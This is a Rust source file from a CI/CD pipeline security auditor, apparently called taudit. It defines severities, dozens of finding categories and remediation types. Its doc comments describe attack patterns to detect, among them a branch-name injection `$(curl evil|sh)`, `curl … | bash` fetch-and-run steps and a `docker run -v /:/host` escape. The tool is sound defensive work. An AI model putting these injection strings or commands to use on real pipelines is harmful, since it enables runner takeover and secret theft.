// taudit_core/finding.rs
1use crate::graph::{AuthorityGraph, NodeId, NodeKind};
2use crate::propagation::PropagationPath;
3use serde::{Deserialize, Serialize};
4use sha2::{Digest, Sha256};
5use std::path::PathBuf;
6
7// ── Finding-output enhancements (v0.10) ────────────────────────────
8//
9// The blue-team corpus defense report (Section 3) recommends a small
10// set of additive `Finding` fields that consumers (SIEMs, dashboards,
11// triage queues) need but cannot derive cheaply. They are:
12//
13//   * `finding_group_id`       — stable UUID v5 over (namespace, fingerprint)
14//                                 so N hops against one secret cluster into
15//                                 a single advisory in downstream tooling.
16//   * `time_to_fix`             — coarse remediation effort enum so triage
17//                                 dashboards can sort by severity * effort.
18//   * `compensating_controls`   — human-readable list of detected controls
19//                                 that downgraded the finding's severity.
20//   * `suppressed`              — set by the `.taudit-suppressions.yml`
21//                                 applicator; preserves audit trail when a
22//                                 finding has been waived rather than fixed.
23//   * `original_severity`       — pre-downgrade severity; populated whenever
24//                                 the suppression applicator OR a compensating
25//                                 control modifies `severity`.
26//   * `suppression_reason`      — operator-supplied justification from the
27//                                 matching `.taudit-suppressions.yml` entry.
28//
29// All six fields live on `FindingExtras` and are flattened into JSON / SARIF
30// output via `#[serde(flatten)]`. New rules can populate them via
31// `Finding::with_time_to_fix(...)` / `Finding::with_compensating_controls(...)`
32// without touching the 31+ existing rule sites.
33
/// Finding severity. Ordered worst-first via the manual `Ord` impl below
/// (`Critical` compares least, `Info` greatest), so a plain ascending sort
/// puts the most severe findings at the top of a report.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
#[serde(rename_all = "snake_case")]
pub enum Severity {
    Critical,
    High,
    Medium,
    Low,
    Info,
}
43
44impl Severity {
45    fn rank(self) -> u8 {
46        match self {
47            Severity::Critical => 0,
48            Severity::High => 1,
49            Severity::Medium => 2,
50            Severity::Low => 3,
51            Severity::Info => 4,
52        }
53    }
54}
55
56impl Ord for Severity {
57    fn cmp(&self, other: &Self) -> std::cmp::Ordering {
58        self.rank().cmp(&other.rank())
59    }
60}
61
62impl PartialOrd for Severity {
63    fn partial_cmp(&self, other: &Self) -> Option<std::cmp::Ordering> {
64        Some(self.cmp(other))
65    }
66}
67
/// MVP categories (1-5) are derivable from pipeline YAML alone.
/// Stretch categories (6-9) need heuristics or metadata enrichment.
/// Later platform-specific additions (GHA / ADO / GitLab rules) are
/// documented per-variant below; the two trailing `#[doc(hidden)]` variants
/// are reserved until the required enrichment data exists.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
#[serde(rename_all = "snake_case")]
pub enum FindingCategory {
    // MVP
    /// Authority (secret/identity) propagates across nodes in the pipeline graph.
    AuthorityPropagation,
    /// An identity grants broader privilege than the pipeline appears to use.
    OverPrivilegedIdentity,
    /// An action/task reference is not pinned to an immutable revision.
    UnpinnedAction,
    /// A step in an untrusted trust zone holds authority (secret/identity).
    UntrustedWithAuthority,
    /// An authority-bearing artifact crosses a trust boundary.
    ArtifactBoundaryCrossing,
    // Stretch — implemented
    /// A container image is referenced by a mutable (floating) tag.
    FloatingImage,
    /// A long-lived static credential is in scope.
    LongLivedCredential,
    /// Credential written to disk by a step (e.g. `persistCredentials: true` on a checkout).
    /// Disk-persisted credentials are accessible to all subsequent steps and any process
    /// with filesystem access, unlike runtime-only `HasAccessTo` authority.
    PersistedCredential,
    /// Dangerous trigger type (pull_request_target / pr) combined with secret/identity access.
    TriggerContextMismatch,
    /// Authority (secret/identity) flows into an opaque external workflow via DelegatesTo.
    CrossWorkflowAuthorityChain,
    /// Circular DelegatesTo chain — workflow calls itself transitively.
    AuthorityCycle,
    /// Privileged workflow (OIDC/broad identity) with no provenance attestation step.
    UpliftWithoutAttestation,
    /// Step writes to the environment gate ($GITHUB_ENV, pipeline variables) — authority can propagate.
    SelfMutatingPipeline,
    /// PR-triggered pipeline checks out the repository — attacker-controlled fork code lands on the runner.
    CheckoutSelfPrExposure,
    /// ADO variable group consumed by a PR-triggered job, crossing trust boundary.
    VariableGroupInPrJob,
    /// Self-hosted agent pool used in a PR-triggered job that also checks out the repository.
    SelfHostedPoolPrHijack,
    /// ADO self-hosted pool without workspace isolation (`clean: true`/`all`).
    /// Shared self-hosted agents retain their workspace across pipeline runs.
    /// Without `workspace: { clean: all }`, a PR build can deposit malicious
    /// files that persist for the next (possibly privileged) pipeline run,
    /// enabling workspace poisoning attacks.
    SharedSelfHostedPoolNoIsolation,
    /// Broad-scope ADO service connection reachable from a PR-triggered job without OIDC.
    ServiceConnectionScopeMismatch,
    /// ADO `resources.repositories[]` entry referenced by an `extends:`,
    /// `template: x@alias`, or `checkout: alias` consumer resolves with no
    /// `ref:` (default branch) or a mutable branch ref (`refs/heads/<name>`).
    /// Whoever owns that branch can inject steps into the consuming pipeline.
    TemplateExtendsUnpinnedBranch,
    /// ADO `resources.repositories[]` entry pinned to a feature-class branch
    /// (anything outside the `main` / `master` / `release/*` / `hotfix/*`
    /// platform set). Feature branches typically have weaker push protection
    /// than the trunk, so any developer with write access to that branch can
    /// inject pipeline YAML that runs with the consumer's authority. Strictly
    /// stronger signal than `template_extends_unpinned_branch` — co-fires.
    TemplateRepoRefIsFeatureBranch,
    /// Pipeline step uses an Azure VM remote-exec primitive (Set-AzVMExtension /
    /// CustomScriptExtension, Invoke-AzVMRunCommand, az vm run-command, az vm extension set)
    /// where the executed command line interpolates a pipeline secret or a SAS token —
    /// pipeline-to-VM lateral movement primitive logged in plaintext to the VM and ARM.
    VmRemoteExecViaPipelineSecret,
    /// A SAS token freshly minted in-pipeline is interpolated into a CLI argument
    /// (commandToExecute / scriptArguments / --arguments / -ArgumentList) instead of
    /// passed via env var or stdin — argv ends up in /proc/*/cmdline, ETW, ARM status.
    ShortLivedSasInCommandLine,
    /// Pipeline secret value assigned to a shell variable inside an inline
    /// script (`export VAR=$(SECRET)`, `$X = "$(SECRET)"`). Once the value
    /// transits a shell variable, ADO's `$(SECRET)` log mask no longer
    /// applies — transcripts (`Start-Transcript`, `bash -x`, terraform debug
    /// logs) print the cleartext.
    SecretToInlineScriptEnvExport,
    /// Pipeline secret value written to a file under the agent workspace
    /// (`$(System.DefaultWorkingDirectory)`, `$(Build.SourcesDirectory)`,
    /// or relative paths) without `secureFile` task or chmod 600. The file
    /// persists in the agent workspace and is uploaded by
    /// `PublishPipelineArtifact` and crawlable by later steps.
    SecretMaterialisedToWorkspaceFile,
    /// PowerShell pulls a Key Vault secret with `-AsPlainText` (or
    /// `ConvertFrom-SecureString -AsPlainText`, or older
    /// `.SecretValueText` syntax) into a non-`SecureString` variable. The
    /// value never traverses the ADO variable-group boundary, so verbose
    /// Az/PS logging and error stack traces print the credential.
    ///
    /// Rule id is `keyvault_secret_to_plaintext` (single token "keyvault")
    /// rather than the snake_case derivation `key_vault_…` — matches the
    /// docs filename and the convention used in the corpus evidence.
    #[serde(rename = "keyvault_secret_to_plaintext")]
    KeyVaultSecretToPlaintext,
    /// `terraform apply -auto-approve` against a production-named service connection
    /// without an environment approval gate.
    TerraformAutoApproveInProd,
    /// `AzureCLI@2` task with `addSpnToEnvironment: true` AND an inline script —
    /// the script can launder federated SPN/OIDC tokens into pipeline variables.
    AddSpnWithInlineScript,
    /// A `type: string` pipeline parameter (no `values:` allowlist) is interpolated
    /// via `${{ parameters.X }}` into an inline shell/PowerShell script body —
    /// shell injection vector for anyone with "queue build".
    ParameterInterpolationIntoShell,
    /// A `run:` block fetches a remote script from a mutable URL (`refs/heads/`,
    /// `/main/`, `/master/`) and pipes it directly to a shell interpreter
    /// (`curl … | bash`, `wget … | sh`, `bash <(curl …)`, `deno run https://…`).
    /// Whoever controls that URL's content controls execution on the runner.
    RuntimeScriptFetchedFromFloatingUrl,
    /// Workflow trigger combines high-authority PR events
    /// (`pull_request_target`, `issue_comment`, or `workflow_run`) with a step
    /// whose `uses:` ref is a mutable branch/tag (not a 40-char SHA). Compromise
    /// of the action's default branch yields full repo write on the target repo.
    PrTriggerWithFloatingActionRef,
    /// A `workflow_run`-triggered workflow captures a value from an external
    /// API response (`gh pr view`, `gh api`, `curl api.github.com`) and writes
    /// it into `$GITHUB_ENV`/`$GITHUB_OUTPUT`/`$GITHUB_PATH` without sanitisation.
    /// A poisoned API field (branch name, title) injects environment variables
    /// into every subsequent step in the same job.
    UntrustedApiResponseToEnvSink,
    /// A `pull_request`-triggered workflow logs into a container registry via a
    /// floating (non-SHA-pinned) login action. The compromised action receives
    /// OIDC tokens or registry credentials, and the workflow then pushes a
    /// PR-controlled image to a shared registry.
    PrBuildPushesImageWithFloatingCredentials,
    /// First-party step writes a Secret/Identity-derived value into the
    /// `$GITHUB_ENV` gate (or pipeline-variable equivalent) and a *later*
    /// step in the same job that runs in `Untrusted` or `ThirdParty` trust
    /// zone reads from the runner-managed env (`${{ env.X }}`). The two
    /// component rules — `self_mutating_pipeline` (writer) and
    /// `untrusted_with_authority` (consumer) — each see only half the
    /// chain and emit no finding for the laundered consumer; this rule
    /// closes the composition gap that R2 attack #3 exploited.
    SecretViaEnvGateToUntrustedConsumer,
    /// Positive-invariant rule (GHA): the workflow declares neither a
    /// top-level nor a per-job `permissions:` block, leaving GITHUB_TOKEN at
    /// its broad platform default. Fires once per workflow file.
    NoWorkflowLevelPermissionsBlock,
    /// Positive-invariant rule (ADO): a job referencing a production-named
    /// service connection has no `environment:` binding, so it bypasses the
    /// only ADO-side approval gate regardless of whether `-auto-approve` is
    /// present. Strictly broader than `terraform_auto_approve_in_prod`.
    ProdDeployJobNoEnvironmentGate,
    /// Positive-invariant rule (cross-platform): a long-lived static
    /// credential is in scope but the workflow does not currently use any
    /// OIDC identity even though the target cloud supports federation.
    /// Advisory uplift on top of `long_lived_credential` that wires the
    /// existing `Recommendation::FederateIdentity` variant.
    LongLivedSecretWithoutOidcRecommendation,
    /// Positive-invariant rule (GHA): a PR-triggered workflow has multiple
    /// privileged jobs where SOME have the standard fork-check `if:` and
    /// OTHERS do not. Detects an intra-file inconsistency in defensive
    /// posture — the org has the right instinct but applied it unevenly.
    PullRequestWorkflowInconsistentForkCheck,
    /// Positive-invariant rule (GitLab): a job with a production-named
    /// `environment:` binding has no `rules:` / `only:` clause restricting
    /// it to protected branches. Deploy job runs (or attempts to run) on
    /// every pipeline trigger.
    GitlabDeployJobMissingProtectedBranchOnly,
    /// Two-step ADO chain: an inline script captures a `terraform output`
    /// value (literal `terraform output` CLI invocation or a `$env:TF_OUT_*` /
    /// `$TF_OUT_*` env var sourced from a Terraform CLI task) AND emits a
    /// `##vso[task.setvariable variable=X;...]` directive setting that
    /// captured value into pipeline variable `X`. A subsequent step in the
    /// same job then expands `$(X)` in shell-expansion position
    /// (`bash -c "..."`, `eval`, command substitution `$(...)`, PowerShell
    /// `-split` / `Invoke-Command` / `Invoke-Expression`/`iex`, or as an
    /// unquoted command word). The `task.setvariable` hop launders
    /// attacker-controlled Terraform state — sourced from a remote backend
    /// (S3 bucket, Azure Storage) that often has weaker access controls than
    /// the pipeline itself — through pipeline-variable space and into a
    /// shell interpreter.
    TerraformOutputViaSetvariableShellExpansion,
    /// GHA workflow declares a high-blast-radius trigger (`issue_comment`,
    /// `pull_request_review`, `pull_request_review_comment`, `workflow_run`)
    /// alongside write permissions or non-`GITHUB_TOKEN` secrets. Closes the
    /// gap left by `trigger_context_mismatch` only firing on
    /// `pull_request_target` / ADO `pr`.
    RiskyTriggerWithAuthority,
    /// A `jobs.<id>.outputs.<name>` value is sourced from `secrets.*`, an
    /// OIDC-bearing step output, or has a credential-shaped name. Job outputs
    /// flow unmasked through `needs.<job>.outputs.*` and are written to the
    /// run log — masking is heuristic, never authoritative.
    SensitiveValueInJobOutput,
    /// A `workflow_dispatch.inputs.*` value flows into `curl` / `wget` /
    /// `gh api` / a `run:` URL / `actions/checkout` `ref:`. Anyone with
    /// dispatch permission can pivot the run to attacker-controlled refs or
    /// hosts.
    ManualDispatchInputToUrlOrCommand,
    /// A reusable workflow call uses `secrets: inherit` while the caller is
    /// triggered by an attacker-influenced event (`pull_request`,
    /// `pull_request_target`, `issue_comment`, `workflow_run`). The whole
    /// caller secret bag forwards to the callee regardless of what the callee
    /// actually consumes — every transitive `uses:` in the called workflow
    /// inherits the same scope.
    SecretsInheritOverscopedPassthrough,
    /// A `workflow_run`- or `pull_request_target`-triggered consumer
    /// downloads an artifact from the originating run AND interprets that
    /// artifact's content into a privileged sink (post-to-comment, write to
    /// `$GITHUB_ENV`, `eval`, …). The producer ran in PR context, so a
    /// malicious PR can write arbitrary content into the artifact while the
    /// consumer holds upstream-repo authority.
    UnsafePrArtifactInWorkflowRunConsumer,
    /// A GitHub Actions `run:` block (or `actions/github-script` `script:` body)
    /// interpolates an attacker-controllable expression — `${{ github.event.* }}`,
    /// `${{ github.head_ref }}`, or `${{ inputs.* }}` from a privileged trigger
    /// (`workflow_dispatch` / `workflow_run` / `issue_comment`) — directly into
    /// the script text without first binding through an `env:` indirection.
    /// Classic GitHub Actions remote-code-execution pattern.
    ScriptInjectionViaUntrustedContext,
    /// A workflow that holds non-`GITHUB_TOKEN` secrets or non-default
    /// write permissions includes a step that uses an interactive debug action
    /// (mxschmitt/action-tmate, lhotari/action-upterm, actions/tmate, …).
    /// A maintainer flipping `debug_enabled=true` publishes the runner's full
    /// environment over an external SSH endpoint.
    InteractiveDebugActionInAuthorityWorkflow,
    /// An `actions/cache` step keys the cache on a PR-derived expression
    /// (`github.head_ref`, `github.event.pull_request.head.ref`, `github.actor`)
    /// in a workflow that ALSO runs on `push: branches: [main]` — a PR can
    /// poison the cache that the default-branch build later restores.
    PrSpecificCacheKeyInDefaultBranchConsumer,
    /// A `run:` step uses `gh ` / `gh api` with the default `GITHUB_TOKEN` to
    /// perform a write-class action (`pr merge`, `release create/upload`,
    /// `api -X POST/PATCH/PUT/DELETE` to `/repos/.../{contents,releases,actions/secrets,environments}`)
    /// inside a workflow triggered by `pull_request`, `issue_comment`, or
    /// `workflow_run` — runtime privilege escalation that static permission
    /// checks miss.
    GhCliWithDefaultTokenEscalating,
    /// GitLab CI `$CI_JOB_TOKEN` (or `gitlab-ci-token:$CI_JOB_TOKEN`) used as a
    /// bearer credential against an external HTTP API or fed to `docker login`
    /// for `registry.gitlab.com`. CI_JOB_TOKEN's default scope (registry write,
    /// package upload, project read) means a poisoned MR job that emits the
    /// token to a webhook can pivot to package/registry pushes elsewhere.
    CiJobTokenToExternalApi,
    /// GitLab CI `id_tokens:` declares an `aud:` audience that is reused across
    /// MR-context and protected-context jobs (no audience separation), or is a
    /// wildcard / multi-cloud broker URL. The audience is what trades for
    /// downstream cloud creds — a single shared `aud` means any job that
    /// compromises the token assumes the most-privileged role any other job
    /// uses.
    IdTokenAudienceOverscoped,
    /// Direct shell interpolation of attacker-controlled GitLab predefined
    /// vars (`$CI_COMMIT_BRANCH`, `$CI_COMMIT_REF_NAME`, `$CI_COMMIT_TAG`,
    /// `$CI_COMMIT_MESSAGE`, `$CI_COMMIT_TITLE`, `$CI_MERGE_REQUEST_TITLE`,
    /// `$CI_MERGE_REQUEST_DESCRIPTION`,
    /// `$CI_MERGE_REQUEST_SOURCE_BRANCH_NAME`, `$CI_COMMIT_AUTHOR`) into
    /// `script:` / `before_script:` / `after_script:` / `environment:url:`
    /// without single-quote isolation. A branch named `` $(curl evil|sh) ``
    /// executes inside the runner. GitLab generalisation of the GHA
    /// `script_injection_via_untrusted_context` class.
    UntrustedCiVarInShellInterpolation,
    /// A GitLab `include:` references (a) a `remote:` URL pointing at a
    /// branch (`/-/raw/<branch>/...`), (b) a `project:` with `ref:` resolving
    /// to a mutable branch name (main/master/develop), or (c) an include with
    /// no `ref:` at all (defaults to HEAD). Whoever owns that branch can
    /// backdoor every consumer's pipeline silently — included YAML executes
    /// with the consumer's secrets and CI_JOB_TOKEN.
    UnpinnedIncludeRemoteOrBranchRef,
    /// A GitLab job declares a `services: [docker:*-dind]` sidecar AND holds
    /// at least one non-CI_JOB_TOKEN secret (registry creds, deploy keys,
    /// signing keys, vault id_tokens). docker-in-docker exposes the full
    /// Docker socket inside the job container — a malicious build step can
    /// `docker run -v /:/host` from inside dind and read the runner host
    /// filesystem (other jobs' artifacts, cached creds).
    DindServiceGrantsHostAuthority,
    /// A GitLab job whose name or `extends:` matches scanner patterns
    /// (`sast`, `dast`, `secret_detection`, `dependency_scanning`,
    /// `container_scanning`, `gitleaks`, `trivy`, `grype`, `semgrep`, etc.)
    /// runs with `allow_failure: true` AND has no `rules:` clause that
    /// surfaces the failure. The pipeline goes green even when the scan
    /// errors out — silent-pass is worse than no scan because reviewers trust
    /// the badge.
    SecurityJobSilentlySkipped,
    /// A GitLab `trigger:` job (downstream / child pipeline) runs in
    /// `merge_request_event` context OR uses `include: artifact:` from a
    /// previous job (dynamic child pipeline). Dynamic child pipelines are a
    /// code-injection sink — anything the build step writes to the artifact
    /// runs as a real pipeline with the parent project's secrets.
    ChildPipelineTriggerInheritsAuthority,
    /// A GitLab `cache:` declaration whose `key:` is hardcoded, `$CI_JOB_NAME`
    /// only, or `$CI_COMMIT_REF_SLUG` without a `policy: pull` restriction.
    /// Caches are stored per-runner keyed by `key:`; a poisoned MR can push a
    /// malicious `node_modules/` cache that the next default-branch job
    /// downloads and executes during `npm install`.
    CacheKeyCrossesTrustBoundary,
    /// A CI script constructs an HTTPS git URL with embedded credentials
    /// (`https://user:$TOKEN@host/...`) before invoking `git clone`,
    /// `git push`, or `git remote set-url`. The credential is exposed
    /// in the process argv (visible to `ps`, `/proc/*/cmdline`), persists
    /// in `.git/config` for the rest of the job, and may be uploaded as
    /// part of any artifact that bundles the workspace.
    PatEmbeddedInGitRemoteUrl,
    /// A CI job triggers a different project's pipeline via the GitLab
    /// REST API using `CI_JOB_TOKEN` and forwards user-influenced variables
    /// through the `variables[KEY]=value` query/form parameter. The
    /// downstream project's security depends on the trust contract between
    /// the two projects — variable values flowing across that boundary
    /// constitute a cross-project authority bridge.
    CiTokenTriggersDownstreamWithVariablePassthrough,
    /// A GitLab job emits an `artifacts.reports.dotenv: <file>` artifact
    /// whose contents become pipeline variables for any consumer linked
    /// via `needs:` or `dependencies:`. A consumer in a later stage that
    /// targets a production-named environment inherits those variables
    /// transparently — no explicit download is visible at the job level.
    /// When the producer reads attacker-influenced inputs (branch names,
    /// commit messages), the dotenv flow is a covert privilege escalation
    /// channel into the deployment job.
    DotenvArtifactFlowsToPrivilegedDeployment,
    /// ADO inline script sets a sensitive-named pipeline variable via
    /// `##vso[task.setvariable variable=<NAME>]` with `issecret=false` or
    /// without the `issecret` flag at all. Without `issecret=true` the
    /// variable value is printed in plaintext to the pipeline log and is
    /// not masked in downstream step output.
    SetvariableIssecretFalse,
    /// A GHA `uses:` action reference contains a non-ASCII character —
    /// possible Unicode confusable / homoglyph impersonating a trusted
    /// action (e.g. Cyrillic `a` instead of Latin `a`, or U+2215
    /// DIVISION SLASH instead of U+002F SOLIDUS).
    HomoglyphInActionRef,
    // Reserved — requires ADO/GH API enrichment beyond pipeline YAML
    /// Requires runtime network telemetry or policy enrichment — not detectable from YAML alone.
    #[doc(hidden)]
    EgressBlindspot,
    /// Requires external audit-sink configuration data — not detectable from YAML alone.
    #[doc(hidden)]
    MissingAuditTrail,
}
387
/// Routing: scope findings -> TsafeRemediation; isolation findings -> CellosRemediation.
///
/// Serialises internally tagged (`"type": "<variant>"` in snake_case) so
/// downstream consumers can dispatch on the remediation kind.
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(tag = "type", rename_all = "snake_case")]
pub enum Recommendation {
    /// Scope-reduction fix expressed as a concrete `command` plus a
    /// human-readable `explanation`.
    // NOTE(review): presumably `command` is a Tsafe CLI invocation — confirm
    // against the Tsafe integration docs.
    TsafeRemediation {
        command: String,
        explanation: String,
    },
    /// Isolation fix routed to Cellos: `reason` says why isolation is needed,
    /// `spec_hint` sketches the isolation spec to apply.
    CellosRemediation {
        reason: String,
        spec_hint: String,
    },
    /// Replace the mutable reference `current` with the immutable `pinned` one.
    PinAction {
        current: String,
        pinned: String,
    },
    /// Narrow a permission grant from `current` down to `minimum`.
    ReducePermissions {
        current: String,
        minimum: String,
    },
    /// Retire the long-lived `static_secret` in favour of OIDC federation
    /// against `oidc_provider` — wired by
    /// `long_lived_secret_without_oidc_recommendation`.
    FederateIdentity {
        static_secret: String,
        oidc_provider: String,
    },
    /// No automatable fix — free-form instruction for a human operator.
    Manual {
        action: String,
    },
}
416
/// Provenance of a finding — distinguishes findings emitted by built-in
/// taudit rules from findings emitted by user-loaded custom invariant YAML
/// (`--invariants-dir`). Custom rules can emit arbitrarily-worded findings
/// at any severity, so an operator piping output into a JIRA workflow or
/// SARIF upload needs a non-spoofable signal of which file the rule came
/// from. Serializes as `"built-in"` (string) for built-in findings and
/// `{"custom": "<path>"}` for custom-rule findings — see
/// `docs/finding-fingerprint.md` for the contract.
#[derive(Debug, Clone, Default, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "snake_case")]
pub enum FindingSource {
    /// Emitted by a built-in rule defined in `taudit-core::rules`. The
    /// authoritative trust anchor — the binary's release commit defines the
    /// rule logic. Serialises as the kebab-case string `"built-in"` to match
    /// `schemas/finding.v1.json`.
    ///
    /// This is the `Default`, so JSON that predates the `source` field
    /// deserialises as built-in (see `Finding::source`).
    #[default]
    #[serde(rename = "built-in")]
    BuiltIn,
    /// Emitted by a custom invariant rule loaded from the given YAML file.
    /// The path is the file the rule was loaded from, retained so operators
    /// can audit which file produced any given finding.
    Custom { source_file: PathBuf },
}
440
441impl FindingSource {
442    /// True for findings emitted by built-in rules.
443    pub fn is_built_in(&self) -> bool {
444        matches!(self, FindingSource::BuiltIn)
445    }
446}
447
/// Coarse-grained remediation effort. Surfaces in JSON `time_to_fix` and SARIF
/// `properties.timeToFix` so triage dashboards can sort by `severity * effort`.
///
/// The four buckets are deliberately wide. Precise time estimates would invite
/// argument; the buckets exist to separate "flip a flag" from "rewrite a job"
/// from "renegotiate ops policy".
///
/// Per `MEMORY/.../blueteam-corpus-defense.md` Section 3 / Enhancement E-3.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "snake_case")]
pub enum FixEffort {
    /// ~5 minutes. Mechanical change to a single file (flip a flag, pin a SHA,
    /// add a `permissions: {}` block). No structural risk.
    Trivial,
    /// ~1 hour. Refactor a step or job: split a script, add a fork-check,
    /// move a secret to an environment binding.
    Small,
    /// ~1 day. Restructure a job or pipeline: introduce an environment gate,
    /// move from inline scripts to a sandboxed action, add an OIDC role.
    Medium,
    /// ~1 week or more. Operational policy change: migrate from PATs to OIDC
    /// across an org, change branch protection model, retire a service principal.
    Large,
}
472
/// Optional finding metadata. Lives on every `Finding` via
/// `#[serde(flatten)]` so consumers see the fields at the top of the
/// finding object — same place they'd appear if declared inline on
/// `Finding`. Default-constructed extras serialize to nothing (all
/// `Option::None` and empty `Vec`s skip-serialize), so existing
/// snapshots remain byte-stable until a rule populates a field.
///
/// **Why a wrapper struct?** The 30+ rule call sites use struct
/// literal syntax. Adding fields directly to `Finding` would force
/// every site to edit. With `extras: FindingExtras::default()`, new
/// extras can be added in a single place.
#[derive(Debug, Clone, Default, Serialize, Deserialize)]
pub struct FindingExtras {
    /// Stable UUID v5 over `(NAMESPACE, fingerprint)` — collapses
    /// per-hop findings against the same authority root into one group
    /// for SIEM display. See `compute_finding_group_id`.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub finding_group_id: Option<String>,

    /// Coarse remediation effort. See `FixEffort`.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub time_to_fix: Option<FixEffort>,

    /// Human-readable list of controls that already neutralise (or partially
    /// neutralise) this finding — populated when a compensating-control
    /// detector downgrades severity. Empty when no downgrade applied.
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub compensating_controls: Vec<String>,

    /// Set to `true` by the suppression applicator when a matching
    /// `.taudit-suppressions.yml` entry exists AND the configured mode
    /// is `Suppress`. The finding still appears in output (audit trail
    /// preserved) but consumers can filter on this field.
    /// `false` is the default and skip-serializes (see `is_false`).
    #[serde(default, skip_serializing_if = "is_false")]
    pub suppressed: bool,

    /// Original pre-downgrade severity. Populated by the suppression
    /// applicator OR a compensating-control detector when `severity`
    /// is mutated. `None` means the current severity is the rule-emitted
    /// value.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub original_severity: Option<Severity>,

    /// Operator-supplied justification from the matching suppression
    /// entry. `None` when no suppression applies.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub suppression_reason: Option<String>,
}
521
/// Serde `skip_serializing_if` predicate for `FindingExtras::suppressed`:
/// true when the flag is unset, so the default `false` serialises to nothing.
#[allow(clippy::trivially_copy_pass_by_ref)]
fn is_false(b: &bool) -> bool {
    !b
}
526
/// A finding is a concrete, actionable authority issue.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Finding {
    /// Current severity — may have been downgraded; the pre-downgrade value,
    /// if any, is in `extras.original_severity`.
    pub severity: Severity,
    pub category: FindingCategory,
    /// Propagation path that produced the finding; `None` (and omitted from
    /// JSON) for findings that are not path-based.
    #[serde(skip_serializing_if = "Option::is_none")]
    pub path: Option<PropagationPath>,
    pub nodes_involved: Vec<NodeId>,
    pub message: String,
    pub recommendation: Recommendation,
    /// Provenance of this finding. Defaults to `BuiltIn` for backward
    /// compatibility with code/JSON that predates the field — every
    /// in-tree built-in rule sets this explicitly. Deserialization of older
    /// JSON without the field treats the finding as built-in.
    #[serde(default)]
    pub source: FindingSource,
    /// Optional metadata (group id, time-to-fix, compensating controls,
    /// suppression markers). Flattens into the JSON object so consumers
    /// see top-level fields — see `FindingExtras` for individual semantics.
    #[serde(flatten, default)]
    pub extras: FindingExtras,
}
549
550impl Finding {
551    /// Builder helper: attach a `time_to_fix` annotation to this finding.
552    /// Call sites: `let f = Finding { ... }.with_time_to_fix(FixEffort::Trivial);`
553    pub fn with_time_to_fix(mut self, effort: FixEffort) -> Self {
554        self.extras.time_to_fix = Some(effort);
555        self
556    }
557
558    /// Builder helper: append a compensating control description and
559    /// downgrade severity by one tier (Critical -> High -> Medium -> Low -> Info).
560    /// Records the original severity so the audit trail survives.
561    pub fn with_compensating_control(mut self, control: impl Into<String>) -> Self {
562        let original = self.severity;
563        self.extras.compensating_controls.push(control.into());
564        self.severity = downgrade_severity(self.severity);
565        if self.extras.original_severity.is_none() {
566            self.extras.original_severity = Some(original);
567        }
568        self
569    }
570}
571
572/// Move severity one rank toward `Info` (Critical -> High -> ... -> Info).
573/// `Info` stays `Info`. Used by both the suppression applicator and
574/// compensating-control detectors.
575pub fn downgrade_severity(s: Severity) -> Severity {
576    match s {
577        Severity::Critical => Severity::High,
578        Severity::High => Severity::Medium,
579        Severity::Medium => Severity::Low,
580        Severity::Low => Severity::Info,
581        Severity::Info => Severity::Info,
582    }
583}
584
585/// Stable UUID v5 over the finding fingerprint. Two findings whose
586/// fingerprints match (same rule + file + root authority) produce the
587/// same `finding_group_id` — that is the whole point: SIEMs and triage
588/// dashboards collapse N hops against a single secret into one row.
589///
590/// The UUID v5 namespace is a fixed UUID v4 derived once and embedded
591/// here. Treating the namespace as load-bearing is intentional: any
592/// future change here would break every consumer that has stored a
593/// `finding_group_id`. Bump only at a major version.
594pub fn compute_finding_group_id(fingerprint: &str) -> String {
595    // UUID v5 = SHA-1(namespace || name), with version + variant bits set.
596    // Implemented inline so taudit-core stays free of the `uuid` crate
597    // dependency (workspace already depends on it from the CLI; core
598    // remains zero-IO and minimal).
599    const NAMESPACE: [u8; 16] = [
600        0x6c, 0x6f, 0xd0, 0xa3, 0x82, 0x44, 0x4f, 0x29, 0xb1, 0x9a, 0x09, 0xc8, 0x7e, 0x49, 0x55,
601        0x21,
602    ];
603
604    use sha1::{Digest as Sha1Digest, Sha1};
605    let mut hasher = Sha1::new();
606    Sha1Digest::update(&mut hasher, NAMESPACE);
607    Sha1Digest::update(&mut hasher, fingerprint.as_bytes());
608    let hash = hasher.finalize();
609
610    let mut bytes = [0u8; 16];
611    bytes.copy_from_slice(&hash[..16]);
612    // RFC 4122 §4.3: set version to 5 (bits 12-15 of time_hi_and_version)
613    bytes[6] = (bytes[6] & 0x0f) | 0x50;
614    // RFC 4122 §4.4: set variant to RFC 4122 (bits 6-7 of clock_seq_hi)
615    bytes[8] = (bytes[8] & 0x3f) | 0x80;
616
617    format!(
618        "{:02x}{:02x}{:02x}{:02x}-{:02x}{:02x}-{:02x}{:02x}-{:02x}{:02x}-{:02x}{:02x}{:02x}{:02x}{:02x}{:02x}",
619        bytes[0], bytes[1], bytes[2], bytes[3],
620        bytes[4], bytes[5],
621        bytes[6], bytes[7],
622        bytes[8], bytes[9],
623        bytes[10], bytes[11], bytes[12], bytes[13], bytes[14], bytes[15],
624    )
625}
626
627// ── Finding fingerprint ────────────────────────────────────
628//
629// Stable cross-run identifier for a finding. Surfaces in:
630//
631//   * SARIF `partialFingerprints[primaryLocationLineHash]`
632//   * JSON  `findings[].fingerprint`
633//   * CloudEvents extension attribute `tauditfindingfingerprint`
634//
635// SIEMs / suppression DBs / dedup pipelines key on this value to
636// recognise "same finding seen on previous run". See
637// `docs/finding-fingerprint.md` for the full contract.
638
/// Pull a custom-rule id out of a finding message of the form
/// `[<id>] rest of message`. Returns `None` when the message does not open
/// with a bracketed, non-empty id. Mirrors the matching helper in
/// `taudit-report-sarif`; kept private so the surface stays minimal.
fn extract_custom_rule_id(message: &str) -> Option<&str> {
    // Must start with '[' — otherwise there is no prefix to parse.
    let rest = message.strip_prefix('[')?;
    // No closing bracket => no id; empty id ("[]") is treated as absent.
    let close = rest.find(']')?;
    let id = &rest[..close];
    (!id.is_empty()).then_some(id)
}
655
